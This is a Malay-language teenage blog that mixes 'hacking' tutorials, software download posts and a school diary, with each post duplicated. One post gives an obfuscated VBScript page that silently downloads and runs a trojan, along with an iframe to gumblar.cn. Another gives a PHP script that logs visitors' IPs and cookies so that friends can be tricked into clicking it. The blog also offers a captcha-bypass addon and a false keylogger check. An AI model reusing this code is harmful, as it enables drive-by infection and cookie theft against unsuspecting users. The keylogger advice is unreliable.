Saturday, April 28, 2012

Hacking : Cara Bypass Captcha (Addon)

Salam sejahtera semua
Hari ni seth nak ajar korang cara bypass captcha seperti gambar di atas dengan mengunakan firefox addons
Website yang dapat Bypas adalah :
 Rapidshare.com
zShare.net
MediaFire.com
Megaupload.com
Sharebee.com
Depositfiles.com
Sendspace.com
Divshare.com
Linkbucks.com
Uploaded.to
Hotfiles.com
4shared.com
Limelinx.com
Link-Protector.com ./ Etc

Download Sini ( firefox addons )
Salam sejahtera semua
Hari ni seth nak ajar korang cara bypass captcha seperti gambar di atas dengan mengunakan firefox addons
Website yang dapat Bypas adalah :
 Rapidshare.com
zShare.net
MediaFire.com
Megaupload.com
Sharebee.com
Depositfiles.com
Sendspace.com
Divshare.com
Linkbucks.com
Uploaded.to
Hotfiles.com
4shared.com
Limelinx.com
Link-Protector.com ./ Etc

Download Sini ( firefox addons )

Hacking : Cara Delete Cache dalam firefox

Bagaiman nak remove cache dalam firefox browser ?



http://documentation.magnolia-cms.com/modules/cache/paragraphs/0/attachment9/cache-configuration.png


Salam sejahtera semua

          hari ni seth nak ajar korang cara buang cache di dalam browser firefox korang . Kenapa ? dan apakah itu cache ? Ikut kesimpulan  saya sendiri .

Cache adalah satu file di mana dia akan menyimpan sementara data data yang telah dibuat seperti kalau korang dan login kedalam facebook . cache akan menyimpan username ./ password ./ history ./ etc

Kenapa korang kena delete ? kalau korang tak delete cache ./ nanti ada pulak kawan korang yang nak cri data sentitive korang seperti akaun bank ./ akaun facebook dan lain lain


*Klik 'Tools'

*Pilih 'Options' , pilih 'Privacy'

*Pada ruangan 'History', setkan bahagian 'Firefox will:' kepada Use custom settings for history.

*Klik kotak semakan untuk Clear history when Firefox closes.

*Klik pada Settings, akan dipapar satu tetingkap Settings for Clearing History.

*Klik pada kotak semakan untuk ruangan 'Cache'.

*Klik 'OK' dan klik sekali lagi 'OK'
Done :D




Bagaiman nak remove cache dalam firefox browser ?



http://documentation.magnolia-cms.com/modules/cache/paragraphs/0/attachment9/cache-configuration.png


Salam sejahtera semua

          hari ni seth nak ajar korang cara buang cache di dalam browser firefox korang . Kenapa ? dan apakah itu cache ? Ikut kesimpulan  saya sendiri .

Cache adalah satu file di mana dia akan menyimpan sementara data data yang telah dibuat seperti kalau korang dan login kedalam facebook . cache akan menyimpan username ./ password ./ history ./ etc

Kenapa korang kena delete ? kalau korang tak delete cache ./ nanti ada pulak kawan korang yang nak cri data sentitive korang seperti akaun bank ./ akaun facebook dan lain lain


*Klik 'Tools'

*Pilih 'Options' , pilih 'Privacy'

*Pada ruangan 'History', setkan bahagian 'Firefox will:' kepada Use custom settings for history.

*Klik kotak semakan untuk Clear history when Firefox closes.

*Klik pada Settings, akan dipapar satu tetingkap Settings for Clearing History.

*Klik pada kotak semakan untuk ruangan 'Cache'.

*Klik 'OK' dan klik sekali lagi 'OK'
Done :D




Friday, April 27, 2012

Hacking : defacement dengan Trojan/malware dan Virus

Salam Sejahtera semua .http://upload.wikimedia.org/wikipedia/en/thumb/2/22/Distorted_waveforms_square_sine.svg/353px-Distorted_waveforms_square_sine.svg.png

Saya tidak bertanggung jawap atas apa apa kerosakan yang berlaku

agree ? Good

Free Download trojan aku bagi dengan korang ..

apa yang akan berlaku jika korang buka html ni :
1. anda akan ridirect ke malware website
2:anda akan download kenyalang.exe
3:anti virus akan block html ni


Apakah itu kenyalang.exe ?

Kenyalang .exe adalah File yang Saya buat ./ apa bila file tersebut dibuka ./ tast manager akan disable ./ dan faham faham lah korang .


         Hari Ni seth nak ajar korang cara membuat defacement yang akan detect Malware,virus dan Trojan

DI dalam defacement Korang.


Code di bawah korang masukan di dalam HTML korang . 


<iframe src="http://gumblar.cn/">

 Dan untuk kode dibawah korang letak di antara

<head> dan </head>

<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">

Contoh Source code yang sudah selesai di gabungkan :

<HTML>
<iframe src="http://gumblar.cn/">
<BODY>
<script language="VBScript">
on error resume next
dl = "www.yoursite.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">
</script>
</BODY>
</HTML>

(save as .html)

Satu Peringatan ./ pada tulisan Hijau yang bertulis  www.yoursite.com/trojan.exe ./  k
Korangupload kenyalang.exe di mana mana filehosting dan masukan di www.yoursite.com/trojan.exe di dalam kode html itu tadi


Kenyalang.exe adalah trojan. korang dilarang untuk membukanya ./ kecuali korang tahu apa yang korang buat


Salam Sejahtera semua .http://upload.wikimedia.org/wikipedia/en/thumb/2/22/Distorted_waveforms_square_sine.svg/353px-Distorted_waveforms_square_sine.svg.png

Saya tidak bertanggung jawap atas apa apa kerosakan yang berlaku

agree ? Good

Free Download trojan aku bagi dengan korang ..

apa yang akan berlaku jika korang buka html ni :
1. anda akan ridirect ke malware website
2:anda akan download kenyalang.exe
3:anti virus akan block html ni


Apakah itu kenyalang.exe ?

Kenyalang .exe adalah File yang Saya buat ./ apa bila file tersebut dibuka ./ tast manager akan disable ./ dan faham faham lah korang .


         Hari Ni seth nak ajar korang cara membuat defacement yang akan detect Malware,virus dan Trojan

DI dalam defacement Korang.


Code di bawah korang masukan di dalam HTML korang . 


<iframe src="http://gumblar.cn/">

 Dan untuk kode dibawah korang letak di antara

<head> dan </head>

<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">

Contoh Source code yang sudah selesai di gabungkan :

<HTML>
<iframe src="http://gumblar.cn/">
<BODY>
<script language="VBScript">
on error resume next
dl = "www.yoursite.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">
</script>
</BODY>
</HTML>

(save as .html)

Satu Peringatan ./ pada tulisan Hijau yang bertulis  www.yoursite.com/trojan.exe ./  k
Korangupload kenyalang.exe di mana mana filehosting dan masukan di www.yoursite.com/trojan.exe di dalam kode html itu tadi


Kenyalang.exe adalah trojan. korang dilarang untuk membukanya ./ kecuali korang tahu apa yang korang buat


Thursday, April 26, 2012

Hacking : Pengumpul maklumat dalam php







Salam Sejahtera semua .

       Hari ni seth nak ajar korang cara nak mendapatkan maklumat magsa kita dengan mengunakan ./ php script

Macam biasa korang kena upload dalam webhosting .

save as .php 


<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="cc.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>


Lepas tu korang buat satu file text dengan nama :

Cc.txt

Sekarang korang suruh kawan korang klik link .php tu . maka segala infomation yang dia sedanggunakan untuk online akan disimpan dalam cc.txt

Itu sahaja . Done . Peace






Salam Sejahtera semua .

       Hari ni seth nak ajar korang cara nak mendapatkan maklumat magsa kita dengan mengunakan ./ php script

Macam biasa korang kena upload dalam webhosting .

save as .php 


<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="cc.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>


Lepas tu korang buat satu file text dengan nama :

Cc.txt

Sekarang korang suruh kawan korang klik link .php tu . maka segala infomation yang dia sedanggunakan untuk online akan disimpan dalam cc.txt

Itu sahaja . Done . Peace

Wednesday, April 25, 2012

Kisah Ku - bahagian kedua

14.09.2011

kembali kepada hari hari yang baru

Sekarang ni aku dekat sekolah . kejap lagi waktu nak masuk kelas . tiap kali aku turun je dari van sekolah . pasti ade sorang kawan aku ni , bawak aku pergi tandas . macam rutin harian pulak pergi tandas ni . Eh maklumlah . me kan comel comel orangnya . tengok tengok cermin dulu . baru masuk kelas . hahahaha

korang ingat tak kakak kepada adek perempuan tu ? masa aku masuk je kelas dia cakap " Eherm-Eherm" haha .

Aku pun hairan . macam mana dia boleh tahu ni ? aku fikir balik . mereka kan adek beradik . mesti la selalu berkongsi cerita . munkin adek dia cakap kot . kakak dia kalau tengok jea aku mesti senyum .

So sekarang dah masuk waktu rehat . aku tak keluar sangat waktu rehat . kadang kadang jea . tu pun pergi tandas sekejap . Aku pun jalan jalan la dekat belakang kelas . Lepas tu kakak dia tegur aku .

"Erry .. Erry . ko x agak nya ka?" ( Erry . kau tak pergi kelas dia ka ?)

Aku pun jawap " Ewh . malas aku mok agak nya .. hahaha" ( aku tak mahu jumpa dia)

Haha . Kalau jumpa dia pun mesti aku malukan ? haish . maklumlah malam tadi lepas mesej dia . dia kan cakap setuju . so kalau jumpa hari ni . Faham faham la korang .


Fuh . lepas balik sekolah . kejap jea dah nak masuk malam . Aku mesej jea dia 24 jam . tak lepas walau seminit pun . aku ni pun satu . Mesej yang aku hantar waktu tu selama dengan dia pendek pendek je. tak ada tanya dia soalan . dia je yang tanya aku soalan .

Munkin sebab tu kot dia boring dengan aku . tapi lupakan tentang benda tu . nanti aku cerita dengan korang k .

Sekarang pun dah nak lewat malam . Aku tanya dia . "Esok awak ada kelas mathematik tak?"

dia pun jawap "ade ! :D"

haa. mean aku boleh la tolong hantarkan . So dia cakap ok .

15.09.2011


Pagi ni lambat jea van nak datang . kebiasaan aku masuk pukul 7 cun jea. sebab kelas start pukul 7.15 . dush . hari ni lambat la pulak . nak hantar kokulater lagi nih . kan semalam dia cakap ade kelas mathematik . hehe

7.oo cun baru aku sampai sekolah . cepat cepat jumpa kakak dia . ambik kolkulater tu . untuk hantar dekat dia tadi . sebab semalam aku dah janji . nak hantarkan .

Dalam perjalanan aku nak hantar . terserempak dengan cikgu BI aku . aku bagi alasan . cakap nak hantar kokulater ni kejap cikgu . hahah.
Marah betul muka cikgu tu tengok aku .

So aku dah pun sampai depan kelas dia . Aku cari cari. sebab baru beberapa kali jumpa ni . selepas hari tu .

Aku pun jumpa dia . dia duduk dekap depan sekali . dia tengah tulis something . aku pun cakap

"nah " . Dia cakap " Eh , Makeseh" Comel je muka dia cakap macam tu dekat aku . aku masih ingat lagi waktu tu .

-Bersambung-
14.09.2011

kembali kepada hari hari yang baru

Sekarang ni aku dekat sekolah . kejap lagi waktu nak masuk kelas . tiap kali aku turun je dari van sekolah . pasti ade sorang kawan aku ni , bawak aku pergi tandas . macam rutin harian pulak pergi tandas ni . Eh maklumlah . me kan comel comel orangnya . tengok tengok cermin dulu . baru masuk kelas . hahahaha

korang ingat tak kakak kepada adek perempuan tu ? masa aku masuk je kelas dia cakap " Eherm-Eherm" haha .

Aku pun hairan . macam mana dia boleh tahu ni ? aku fikir balik . mereka kan adek beradik . mesti la selalu berkongsi cerita . munkin adek dia cakap kot . kakak dia kalau tengok jea aku mesti senyum .

So sekarang dah masuk waktu rehat . aku tak keluar sangat waktu rehat . kadang kadang jea . tu pun pergi tandas sekejap . Aku pun jalan jalan la dekat belakang kelas . Lepas tu kakak dia tegur aku .

"Erry .. Erry . ko x agak nya ka?" ( Erry . kau tak pergi kelas dia ka ?)

Aku pun jawap " Ewh . malas aku mok agak nya .. hahaha" ( aku tak mahu jumpa dia)

Haha . Kalau jumpa dia pun mesti aku malukan ? haish . maklumlah malam tadi lepas mesej dia . dia kan cakap setuju . so kalau jumpa hari ni . Faham faham la korang .


Fuh . lepas balik sekolah . kejap jea dah nak masuk malam . Aku mesej jea dia 24 jam . tak lepas walau seminit pun . aku ni pun satu . Mesej yang aku hantar waktu tu selama dengan dia pendek pendek je. tak ada tanya dia soalan . dia je yang tanya aku soalan .

Munkin sebab tu kot dia boring dengan aku . tapi lupakan tentang benda tu . nanti aku cerita dengan korang k .

Sekarang pun dah nak lewat malam . Aku tanya dia . "Esok awak ada kelas mathematik tak?"

dia pun jawap "ade ! :D"

haa. mean aku boleh la tolong hantarkan . So dia cakap ok .

15.09.2011


Pagi ni lambat jea van nak datang . kebiasaan aku masuk pukul 7 cun jea. sebab kelas start pukul 7.15 . dush . hari ni lambat la pulak . nak hantar kokulater lagi nih . kan semalam dia cakap ade kelas mathematik . hehe

7.oo cun baru aku sampai sekolah . cepat cepat jumpa kakak dia . ambik kolkulater tu . untuk hantar dekat dia tadi . sebab semalam aku dah janji . nak hantarkan .

Dalam perjalanan aku nak hantar . terserempak dengan cikgu BI aku . aku bagi alasan . cakap nak hantar kokulater ni kejap cikgu . hahah.
Marah betul muka cikgu tu tengok aku .

So aku dah pun sampai depan kelas dia . Aku cari cari. sebab baru beberapa kali jumpa ni . selepas hari tu .

Aku pun jumpa dia . dia duduk dekap depan sekali . dia tengah tulis something . aku pun cakap

"nah " . Dia cakap " Eh , Makeseh" Comel je muka dia cakap macam tu dekat aku . aku masih ingat lagi waktu tu .

-Bersambung-

Cewah Hacking : Komputer anda ada keylogger ?

salam Sejahtera semua

Hari ni seth nak ajar korang cara nak melihat ada tak keylogger dalam komputer korang .
Macam mana ?

Korang buka CMD .

Bagaimana ?

Start > Run > CMD > [Enter]

Start > Command Prompt [Enter]

Lepas tu korang taip ni :

Dir [ Enter ]

(Rujuk Gambar dibawah)


Korang akan nampak macam gambar di atas .

Korang tengok garisan . sekarang korang salin ip tu ke dalam notepad

dan ulang langkah yang sama sebanyak 5 kali.

kalau number tersebut berubah maksutnya komputer korang ada keylogger .

cara remove ? Klik sini

Done. itu sahaja .
salam Sejahtera semua

Hari ni seth nak ajar korang cara nak melihat ada tak keylogger dalam komputer korang .
Macam mana ?

Korang buka CMD .

Bagaimana ?

Start > Run > CMD > [Enter]

Start > Command Prompt [Enter]

Lepas tu korang taip ni :

Dir [ Enter ]

(Rujuk Gambar dibawah)


Korang akan nampak macam gambar di atas .

Korang tengok garisan . sekarang korang salin ip tu ke dalam notepad

dan ulang langkah yang sama sebanyak 5 kali.

kalau number tersebut berubah maksutnya komputer korang ada keylogger .

cara remove ? Klik sini

Done. itu sahaja .

Tuesday, April 24, 2012

Cewah Hacking : Cara Buat Folder yang tidak dapat di Delete / Etc

Salam Sejahtera semua

Hari ni seth nak ajar korang cara buat folder yang korang yang tak dapat Delete ./ Rename ./ Move ./ Copy ./ paste ./ what ever .

So macam mana nak buat ? apa yang korang perlu lakukan ?

Ok . pertama kali korang buka command Prompt (cmd)

Start > Run > Cmd > [Enter] .

Start > Cmd > Command Prompt

Lepas tu dalam command Prompt taip ni

1. OK. Contoh korang nak buat dalam Disk D,

2. Buka Command Prompt (cmd), Lalu Taip D:, [Enter]

3. Kalau Korang dah dalam dir D:\> Taip md \lpt1\\ Lepas tu tekan [Enter]

(rujuk gambar Dibawah)


Peringatan : lpt1 hanya Boleh mengunakan nama itu sahaja . korang tak boleh nak tukar kepada nama yang lain

Ok . selepas korang tekan enter . Di dalam local disk D: akan tercipta satu folder yang bernama Ipti .

Untuk memasukan File ke dalam folder ni . korang cuma boleh memasukan ke dalam folder tsb . Right klik dan new ./ Notepad ./ Folder ./ Etc .

Ok . Untuk folder ni . korang kena taip ni di dalam CMD

D:\> taip rd \lpt1\\ dan [Enter]

Itu sahaja .

p/s : Sebelum korang delete folder ni . korang kena delete semua file yang ada folder tu

Ada masaalah ? Contact Saya dekat Facebook : Seth Erry
Salam Sejahtera semua

Hari ni seth nak ajar korang cara buat folder yang korang yang tak dapat Delete ./ Rename ./ Move ./ Copy ./ paste ./ what ever .

So macam mana nak buat ? apa yang korang perlu lakukan ?

Ok . pertama kali korang buka command Prompt (cmd)

Start > Run > Cmd > [Enter] .

Start > Cmd > Command Prompt

Lepas tu dalam command Prompt taip ni

1. OK. Contoh korang nak buat dalam Disk D,

2. Buka Command Prompt (cmd), Lalu Taip D:, [Enter]

3. Kalau Korang dah dalam dir D:\> Taip md \lpt1\\ Lepas tu tekan [Enter]

(rujuk gambar Dibawah)


Peringatan : lpt1 hanya Boleh mengunakan nama itu sahaja . korang tak boleh nak tukar kepada nama yang lain

Ok . selepas korang tekan enter . Di dalam local disk D: akan tercipta satu folder yang bernama Ipti .

Untuk memasukan File ke dalam folder ni . korang cuma boleh memasukan ke dalam folder tsb . Right klik dan new ./ Notepad ./ Folder ./ Etc .

Ok . Untuk folder ni . korang kena taip ni di dalam CMD

D:\> taip rd \lpt1\\ dan [Enter]

Itu sahaja .

p/s : Sebelum korang delete folder ni . korang kena delete semua file yang ada folder tu

Ada masaalah ? Contact Saya dekat Facebook : Seth Erry

Monday, April 23, 2012

Cewah Hacking : Joomla Security Scanner

Salam Sejahtera semua .

Hari Ni Seth nak share korang satu software untuk scan vulnerable kepada Sqli Injection . Joomla plaform dan lain lain .
http://desmond.imageshack.us/Himg703/scaled.php?server=703&filename=jvsd.jpg&res=landing

Download Sini
Salam Sejahtera semua .

Hari Ni Seth nak share korang satu software untuk scan vulnerable kepada Sqli Injection . Joomla plaform dan lain lain .
http://desmond.imageshack.us/Himg703/scaled.php?server=703&filename=jvsd.jpg&res=landing

Download Sini

Cewah Hacking : Desktop Icon Toy Download

Salam sejahtera semua


Hari ni seth nak kongsi satu software untuk buat icon dekat desktop bergerak gerak dan buat corak yang best best


.http://2.bp.blogspot.com/-IQ38aJwxTjU/TynGLNP-X2I/AAAAAAAABO8/acyO9Ie1ZB4/s1600/scr-desktop-icon-toy.jpeg

Download Sini
Salam sejahtera semua


Hari ni seth nak kongsi satu software untuk buat icon dekat desktop bergerak gerak dan buat corak yang best best


.http://2.bp.blogspot.com/-IQ38aJwxTjU/TynGLNP-X2I/AAAAAAAABO8/acyO9Ie1ZB4/s1600/scr-desktop-icon-toy.jpeg

Download Sini

Cewah Hacking : Tweak Logon

Salam Sejahtera


Hari ni seth nak kongsi satu software untuk tukar gambar ada startup Destop Korang . yang waktu korang buka laptop . akan keluar masukan password . software ni berfungsi untuk ubah background belakang tu . so korang pandai pandai la explore k .http://www.neowin.net/images/uploaded/logon-preview.PNG

Download Sini
Salam Sejahtera


Hari ni seth nak kongsi satu software untuk tukar gambar ada startup Destop Korang . yang waktu korang buka laptop . akan keluar masukan password . software ni berfungsi untuk ubah background belakang tu . so korang pandai pandai la explore k .http://www.neowin.net/images/uploaded/logon-preview.PNG

Download Sini

Cewah Hacking : Apakah Itu virus ?




Virus komputer adalah nama yang diambil dari virus biologi, merupakan program komputer yang berupaya menyalin dirinya sendiri dan menjangkiti komputer tanpa kebenaran ataupun pengetahuan pengguna. Bagaimanapun perkataan virus biasanya digunakan bagi merujuk kepada pelbagai jenis perisian perosak yang berlainan. Virus yang asal mungkin mengubah suai salinannya atau salinan itu sendiri yang mengubah suai dirinya, seperti dalam virus metamorf. Virus hanya boleh tersebar apabila hosnya sampai ke komputer lain, contohnya melalui rangkaian atau perantara mudah alih seperti cakera liut, cakera padat atau pemacu kilat USB. Selain itu, virus juga boleh merebak dengan menjangkiti fail pada sistem fail rangkaian atau mana-mana sistem fail yang dicapai komputer lain.

http://2.bp.blogspot.com/-Qh4k6LYnGAc/TdlGfO5Si8I/AAAAAAAAAVU/AjRWzFo7ZFc/s1600/computer-virus-picturejpg.jpg
Sesetengah virus direka untuk menjejaskan komputer dengan merosakkan atur cara, menghapuskan fail, atau memformat semula cakera keras, manakala virus-virus yang lain direka bukan untuk merosakkan apa-apa, tetapi hanya untuk menyalin diri dan mungkin untuk menonjolkan kewujudannya melalui pemaparan teks, video, atau pesanan audio. Walaupun virus yang kedua ini tidak berbahaya, ia juga boleh menimbulkan masalah kepada pengguna komputer kerana ia menelan ingatan komputer yang digunakan oleh atur cara yang sah. Oleh yang demikian, ia seringnya mengakibatkan tindakan yang tidak menentu dan boleh mengakibatkan kerosakan sistem. Selain itu, banyak virus juga mengandungi pepijat yang boleh mengakibatkan kerosakan sistem dan kehilangan data.


Virus komputer kekadangnya dikelirukan dengan cecacing komputer dan kuda Trojan. Kedua-dua ini berbeza dari segi bahawa cecacing boleh merebak ke komputer yang lain tanpa memerlukannya dipindahkan sebagai sebahagian fail perumah, manakala kuda Trojan adalah fail yang kelihatan tidak berbahaya sehingga dilaksanakan. Berbeza dengan virus, kuda Trojan juga tidak memasukkan kodnya ke dalam fail-fail komputer yang lain.
http://www.ganggeek.com/wp-content/uploads/2012/03/computer-virus.jpg

Banyak komputer peribadi kini dihubungkan dengan internet serta rangkaian kawasan setempat dan dengan itu, memudahkan perebakan virus. Ia mengambil kesempatan yang diberikan oleh perkhidmatan rangkaian seperti sistem-sistem Jaringan Sejagat, e-mel, dan pengongsian fail untuk merebak dan dengan itu, mengaburi perbezaan antara virus dengan cecacing komputer. Tambahan pula, sesetengah sumber menggunakan istilah alternatif yang mentakrifkan virus sebagai mana-mana bentuk perisian jahat penyalinan diri!



Virus komputer adalah nama yang diambil dari virus biologi, merupakan program komputer yang berupaya menyalin dirinya sendiri dan menjangkiti komputer tanpa kebenaran ataupun pengetahuan pengguna. Bagaimanapun perkataan virus biasanya digunakan bagi merujuk kepada pelbagai jenis perisian perosak yang berlainan. Virus yang asal mungkin mengubah suai salinannya atau salinan itu sendiri yang mengubah suai dirinya, seperti dalam virus metamorf. Virus hanya boleh tersebar apabila hosnya sampai ke komputer lain, contohnya melalui rangkaian atau perantara mudah alih seperti cakera liut, cakera padat atau pemacu kilat USB. Selain itu, virus juga boleh merebak dengan menjangkiti fail pada sistem fail rangkaian atau mana-mana sistem fail yang dicapai komputer lain.

http://2.bp.blogspot.com/-Qh4k6LYnGAc/TdlGfO5Si8I/AAAAAAAAAVU/AjRWzFo7ZFc/s1600/computer-virus-picturejpg.jpg
Sesetengah virus direka untuk menjejaskan komputer dengan merosakkan atur cara, menghapuskan fail, atau memformat semula cakera keras, manakala virus-virus yang lain direka bukan untuk merosakkan apa-apa, tetapi hanya untuk menyalin diri dan mungkin untuk menonjolkan kewujudannya melalui pemaparan teks, video, atau pesanan audio. Walaupun virus yang kedua ini tidak berbahaya, ia juga boleh menimbulkan masalah kepada pengguna komputer kerana ia menelan ingatan komputer yang digunakan oleh atur cara yang sah. Oleh yang demikian, ia seringnya mengakibatkan tindakan yang tidak menentu dan boleh mengakibatkan kerosakan sistem. Selain itu, banyak virus juga mengandungi pepijat yang boleh mengakibatkan kerosakan sistem dan kehilangan data.


Virus komputer kekadangnya dikelirukan dengan cecacing komputer dan kuda Trojan. Kedua-dua ini berbeza dari segi bahawa cecacing boleh merebak ke komputer yang lain tanpa memerlukannya dipindahkan sebagai sebahagian fail perumah, manakala kuda Trojan adalah fail yang kelihatan tidak berbahaya sehingga dilaksanakan. Berbeza dengan virus, kuda Trojan juga tidak memasukkan kodnya ke dalam fail-fail komputer yang lain.
http://www.ganggeek.com/wp-content/uploads/2012/03/computer-virus.jpg

Banyak komputer peribadi kini dihubungkan dengan internet serta rangkaian kawasan setempat dan dengan itu, memudahkan perebakan virus. Ia mengambil kesempatan yang diberikan oleh perkhidmatan rangkaian seperti sistem-sistem Jaringan Sejagat, e-mel, dan pengongsian fail untuk merebak dan dengan itu, mengaburi perbezaan antara virus dengan cecacing komputer. Tambahan pula, sesetengah sumber menggunakan istilah alternatif yang mentakrifkan virus sebagai mana-mana bentuk perisian jahat penyalinan diri!

Cewah Hacking : Ashampoo Burning Studio v10.0.15 Final - Multilingual - Full

Salam sejahtera


Hari ni seth nak kongsi satu software untuk burn disc . sangat berguna . kalau korang nak korang boleh download .




Download Sini
Salam sejahtera


Hari ni seth nak kongsi satu software untuk burn disc . sangat berguna . kalau korang nak korang boleh download .




Download Sini

Sunday, April 22, 2012

Kisah Hidup aku

12.9.2011

Fuh
~ Hari ni aku dekat sekolah . boring pulak rasanya harini . so aku ada plan nak pergi kantin dengan kawan aku . Macam biasa , tengah berjalan bergurau senda dengan kawan kawan . kawan aku ni cukup spoting . dia juga orang yang serius . so memang biasa la orang lelaki .

so dalam perjalanan pergi ke kantin . aku terjumpa seorang budak perempuan ni . kakak dia sama kelas dengan aku .
s
Aku pura pura linpas depan dia . Dah sampai je depan dia aku mintak no handphone . kot kot dia nak kasi . rupanya tak . dia senyum senyum manis je dengan aku . budak tu budak bidayuh . dia tak nak kasi dengan aku dan jalan terus je

ok . so harini aku melepas lagi . harap besok aku dapat minta number dia balik . sebab aku lebih berani meluahkan perasaan mengunakan cara mesej daripada face to face .

Balik kelas je lepas minta number perempuan tu tadi . kan dia tak nak kasi dengan aku . so aku minta dengan kakak dia pulak . so ni secara ringas penjelasan tentang latar belakang perempuan tu . dia orang bidayuh .

So aku masih ingat apa yang dia ajar dengan aku . "do nuak piin ti ?" tak betul kot ejaan tu . tapi maksut dia "kau nak tak minum air ni?" hahaha .

Berbalik kepada cerita aku dengan kakak di pulak . so aku cuba minta dengan kakak dia .
lepas tu kakak dia cakap macam ni "mintak kau pun dengan nya . aku sik ingat number hanpon nya aih . hahah "
maksut nya "kau minta dengan dia sendiri . aku tak ingat number dia"

Dalam hati aku cakap aduhh ~~

hahah . memang biasa la kot . perempuan mana nak kasi number adek dia dengan orang lain . so aku nak try minta number dia balik .

13.9.2011

